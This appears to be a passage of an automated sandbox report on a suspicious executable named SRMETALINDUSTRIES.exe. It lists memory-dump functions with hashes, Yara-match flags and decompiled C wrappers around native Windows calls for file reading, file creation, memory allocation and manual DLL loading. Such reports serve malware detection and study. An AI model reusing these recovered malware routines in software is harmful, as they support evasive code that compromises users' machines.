Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7bf990465b8e1a627cbb3cbadafe815b9bcea28d407dd8733f082cc922ad7e3a
Instruction ID: b909bcd467066cfecbfc4766940fb737b528553c4218017a6f99c5b4c56c004f
Opcode Fuzzy Hash: 7bf990465b8e1a627cbb3cbadafe815b9bcea28d407dd8733f082cc922ad7e3a
Instruction Fuzzy Hash: 0E1146B1D003488BCB10DFA9D9457EFFBF5AB88324F248829D519A7250CB35A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04805428, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 04805488

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 96ef07a6c8098da0d1315d323576a64f80277e2d645156b93a744cf7d7636eb3
Instruction ID: 36506cc13e5c28eafd1e97c3e6682276e8e2d3e4319e7247da8166f39ce00f4b
Opcode Fuzzy Hash: 96ef07a6c8098da0d1315d323576a64f80277e2d645156b93a744cf7d7636eb3
Instruction Fuzzy Hash: 5B1166B18006098FCB10CF99C585BDEBBF4EF48324F24891AD968A7780D738A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 048019E8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04801A4A

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bd286dd2b80ccac81dec29cba6b4ba06c2015d011de9b7de997e843616867d86
Instruction ID: 94c15ea806da5e7b55fa10d394698c5276f857c5bfd7f639755725754e27983a
Opcode Fuzzy Hash: bd286dd2b80ccac81dec29cba6b4ba06c2015d011de9b7de997e843616867d86
Instruction Fuzzy Hash: 95116A71D003088BCB10DFA9C9447DFFBF4AB88324F248829D519A7240CB35A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04805430, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 04805488

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ddb37b2de248f9a332ff7d147c75e284a099979251cd02ce8fc44a1b9df15331
Instruction ID: 469ddb36cf9fd43a936e33435fd3e3a5bdcc0ea3f27bc1f0c6b8bd9d7ffb6e96
Opcode Fuzzy Hash: ddb37b2de248f9a332ff7d147c75e284a099979251cd02ce8fc44a1b9df15331
Instruction Fuzzy Hash: 8D1133B58006098FCB10CF99C945BDEBBF8EB48324F24882AD958A7740D738A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04804A40, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04804AA5

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: dfeb56b26da85b9b70abd4ef45ce008ef62ddddd6a3e73fe03c8ec9bc410edbc
Instruction ID: 987d93290640962562367e43eebf6e6fdef52b9f2c2ec2f7a8152a4ccbfcfb41
Opcode Fuzzy Hash: dfeb56b26da85b9b70abd4ef45ce008ef62ddddd6a3e73fe03c8ec9bc410edbc
Instruction Fuzzy Hash: 721115B5800249CFDB10CF99D989BDFBBF4EB48324F24881AE514A7650C378A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04804A48, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04804AA5

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 26527ade39e6925a3154af91ce3b189e2a3f2d39a3b6af649829534c03ed65a6
Instruction ID: 1dea0c2e97e931e5d7d17028366be574dbf37dc5c360e2d2145b4ec5c24bc2ac
Opcode Fuzzy Hash: 26527ade39e6925a3154af91ce3b189e2a3f2d39a3b6af649829534c03ed65a6
Instruction Fuzzy Hash: 7C11E5B58003499FDB10CF99D989BDFBBF8EB48724F148819D914A7640C374A994CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0096D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356219650.000000000096D000.00000040.00000001.sdmp, Offset: 0096D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdf1d91e883bc1ed6ee418aa65cd1e602122686be637aa6abfb730ac6f05bfac
Instruction ID: be90d42b6854ea2a8655b920bc7b0ad855183a624e60cbd8b24c43796cf93123
Opcode Fuzzy Hash: bdf1d91e883bc1ed6ee418aa65cd1e602122686be637aa6abfb730ac6f05bfac
Instruction Fuzzy Hash: EB213A71A05240DFDB11DF14D9C0F26BF69FB88328F24C969E8060B65AC336E855CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0097D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356239640.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2460068d415f77912c31fd71490e7dd534df68d36b1741dc13847e69d2c6ef3
Instruction ID: 9cfc5d05c75b7ee8e246b557848778bb22bd04f93113319816509b06fcbc4c03
Opcode Fuzzy Hash: e2460068d415f77912c31fd71490e7dd534df68d36b1741dc13847e69d2c6ef3
Instruction Fuzzy Hash: 7321D372605244EFDB05DF50D5C0B16BB79FF84318F24C9A9D80D4B252C73AE856CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0097D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356239640.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb692578a0d30997d828ee864e3931102448021f14016e65495ba72d793f8daa
Instruction ID: 90590bc53878fd5a0b9aaf5fcdef471e42086e6f20402b030fa0b8654a0c14d4
Opcode Fuzzy Hash: cb692578a0d30997d828ee864e3931102448021f14016e65495ba72d793f8daa
Instruction Fuzzy Hash: ED210072504240DFCB10CF20D9C4B26BB79FF88328F24C9A9D80D0B246C33AD816CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0097D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356239640.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d6894256c6d8a758243c9e4cee4392b5c0f7a48c8d7c068247e1360074c14c
Instruction ID: ec2da761177702ebe230260c6ad7b2e3ce419376b3cfd99e02ca890649f6edf9
Opcode Fuzzy Hash: 01d6894256c6d8a758243c9e4cee4392b5c0f7a48c8d7c068247e1360074c14c
Instruction Fuzzy Hash: 842180765093C08FCB12CF24D990715BF71EF46314F29C5DAD8498B697C33A981ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0096D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356219650.000000000096D000.00000040.00000001.sdmp, Offset: 0096D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593b7f8078e8e3006706d81062bbcafb98b3ffc35bb74dd160bcbe49ccad5eaf
Instruction ID: 54117e4120109d82a89123f02f2f6a5742ad2a68b594dcecbf142a4a41ed3388
Opcode Fuzzy Hash: 593b7f8078e8e3006706d81062bbcafb98b3ffc35bb74dd160bcbe49ccad5eaf
Instruction Fuzzy Hash: 46110876905280CFCF11CF14D5C4B16BF71FB88324F28C6AAE8450B61AC336D856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0097D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356239640.000000000097D000.00000040.00000001.sdmp, Offset: 0097D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bc07e27ac38c6520d53d955b4da33624f675f1b5a16c324a4a69b08b2853fb
Instruction ID: f864094365aa5990bdd5bb35b0b5fdcdc99eb416814564e4bb9fb47c47df0a57
Opcode Fuzzy Hash: c9bc07e27ac38c6520d53d955b4da33624f675f1b5a16c324a4a69b08b2853fb
Instruction Fuzzy Hash: FA118B76905280DFDB11CF14D6C4B15BFB1FF84324F28C6A9D8494B656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0096D745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356219650.000000000096D000.00000040.00000001.sdmp, Offset: 0096D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5cc9edd19ff56eafecb1e7067faa0905c1f8b36933d60953f4479f27d53938
Instruction ID: 3a5381ea1dd79a8c278311a15f225f66b4d4ee8e69d1bd90ae11dcb5fa084410
Opcode Fuzzy Hash: ab5cc9edd19ff56eafecb1e7067faa0905c1f8b36933d60953f4479f27d53938
Instruction Fuzzy Hash: 01017BB1A093809AE7104F21CEC4B66FBDCDF41334F18885AED240F282C7389C40CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 0096D744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356219650.000000000096D000.00000040.00000001.sdmp, Offset: 0096D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28973883e579ce95e3bea2b20ac1efa13d827107135b2dfc95806a72f7d5669
Instruction ID: 8715d3c82ad0ac1f0859731731c4c24bb676dc82fbe726fce35443da45f86638
Opcode Fuzzy Hash: b28973883e579ce95e3bea2b20ac1efa13d827107135b2dfc95806a72f7d5669
Instruction Fuzzy Hash: 1CF062719053849EE7108E16DD88B62FF9CEB41734F18C45AED185B286C7799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04802ED8, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e9a29d2361b36ba5e52d79f1399622c0ccea787d6249af14a9dfd00f7233ee
Instruction ID: 6c8f390a4b238d2d6b10a460be8c75da65791a5ca82eb1600fcac4ee2b4c2285
Opcode Fuzzy Hash: 87e9a29d2361b36ba5e52d79f1399622c0ccea787d6249af14a9dfd00f7233ee
Instruction Fuzzy Hash: 12614A70E252098F8B44CFA9D9454AEFBB2EF89340F10D92AD816F7344E7746E428F95

Uniqueness

Uniqueness Score: -1.00%

Function 04802EC8, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc4db2e508b532b368dc9c438c86c4adf264013358aa530ba6a27a224ffd729
Instruction ID: b47529d493ea266fae8cd784381ad32e504999924b90582c51a6e9107a150ad1
Opcode Fuzzy Hash: acc4db2e508b532b368dc9c438c86c4adf264013358aa530ba6a27a224ffd729
Instruction Fuzzy Hash: AA612670E252098F9B44CFA9D5455AEFBB2EF88300F10D92AD816F7344E7746A428F95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SRMETALINDUSTRIES.exe PID: 1260 Parent PID: 6164 SRMETALINDUSTRIES.exeCOMMON

Executed Functions

Function 0041867C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041867C(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				_t13 = _a4;
				_t30 = _a4 + 0xc48;
				E004191D0(_t28, _t13, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t29, _t32); // executed
				return _t18;
			}

0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,5E972F61,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F61,00413D62,?,00000000), ref: 004186C5

Strings

b=A, xrefs: 004186A2, 004186B0
!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186BD, 004186C4

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: b49bfe3e94cae1dcbc40abdafda298412c5c4fa63a8dfba4d2ee47c869c30831
Instruction ID: 3089b46c72f5aab759fa85e3151979c9588bdfc581c9eb52c0f865024569e9d0
Opcode Fuzzy Hash: b49bfe3e94cae1dcbc40abdafda298412c5c4fa63a8dfba4d2ee47c869c30831
Instruction Fuzzy Hash: 8DF0F4B2200108ABCB08DF89DC84EEB77A9AF8C754F158249BE0D97241C630EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,5E972F61,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F61,00413D62,?,00000000), ref: 004186C5

Strings

b=A, xrefs: 004186A2, 004186B0
!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186BD, 004186C4

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004185CA(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;
				void* _t34;

				asm("out 0x55, eax");
				_t18 = _a4;
				_t5 = _t18 + 0xc40; // 0xc40
				E004191D0(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}

0x004185cf
0x004185d3
0x004185df
0x004185e7
0x0041861d
0x00418621

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f78be1b140dab5305cbbf2f663d2df02f56d22fa14f1c90ace7b4b96278f10ac
Instruction ID: d00bba17fc3c2051fc433998128fe7b50e416ad279f67ead831ebfa423176ce8
Opcode Fuzzy Hash: f78be1b140dab5305cbbf2f663d2df02f56d22fa14f1c90ace7b4b96278f10ac
Instruction Fuzzy Hash: 4001ABB2204208AFDB48CF89DC95EEB37EDAF8C754F158258BA0DD7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185df
0x004185e7
0x0041861d
0x00418621

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187AC, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004187AC(void* __ecx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;
				void* _t23;

				_push(0xec8b5510);
				_t10 = _v0;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191D0(_t23, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}

0x004187ae
0x004187b3
0x004187bf
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a5e1590b6d16597e439d821b267d88acc625dee58ee59e02f000c2c4b3e50d47
Instruction ID: c8e2b5d723facf5517a7e53ecc7967b5bd8c8a80918e75e20dd9e98176ae4538
Opcode Fuzzy Hash: a5e1590b6d16597e439d821b267d88acc625dee58ee59e02f000c2c4b3e50d47
Instruction Fuzzy Hash: 2AF015B6200109BBDB18DF89DC95EEB77ADAF88354F158549FE08A7241D630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187bf
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004186FB, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004186FB(void* __eax, intOrPtr _a4, void* _a8) {
				long _t14;
				void* _t18;

				_t11 = _a4;
				_t6 = _t11 + 0x10; // 0x300
				_t7 = _t11 + 0xc50; // 0x409753
				E004191D0(_t18, _a4, _t7,  *_t6, 0, 0x2c);
				_t14 = NtClose(_a8); // executed
				return _t14;
			}

0x00418703
0x00418706
0x0041870f
0x00418717
0x00418725
0x00418729

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b44743663bd0e1e0445ed0e3c9b5bc4212c4f8d467fd3034acd08da694b14433
Instruction ID: 0810284070dfd8765618d9814fb2be3627ea47f6e951ab7df9c05eb14fc129a4
Opcode Fuzzy Hash: b44743663bd0e1e0445ed0e3c9b5bc4212c4f8d467fd3034acd08da694b14433
Instruction Fuzzy Hash: 4DE08C35204204ABE714EB98CC49E973768EB48360F044459FA085B242C530E94086D0

Uniqueness

Uniqueness Score: -1.00%

Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418703
0x00418706
0x0041870f
0x00418717
0x00418725
0x00418729

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088C0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E10(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407020( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407050( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088cb
0x004088d3
0x004088d5
0x004088da
0x004088df
0x004088f2
0x004088f7
0x00408900
0x0040890c
0x0040891f
0x00408924
0x00408927
0x00408930
0x00408942
0x00408947
0x0040894c
0x00000000
0x00000000
0x0040894e
0x00408952
0x00000000
0x00000000
0x00408954
0x00000000
0x00408952
0x00408956
0x00408959
0x0040895f
0x00408961
0x0040896c
0x00408971
0x00408974
0x00408981
0x0040898c
0x0040898e
0x00408994
0x00408998
0x0040899b
0x0040899b
0x004089a2
0x004089a5
0x004089aa
0x004089b7
0x004088e6
0x004088e6
0x004088e6

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
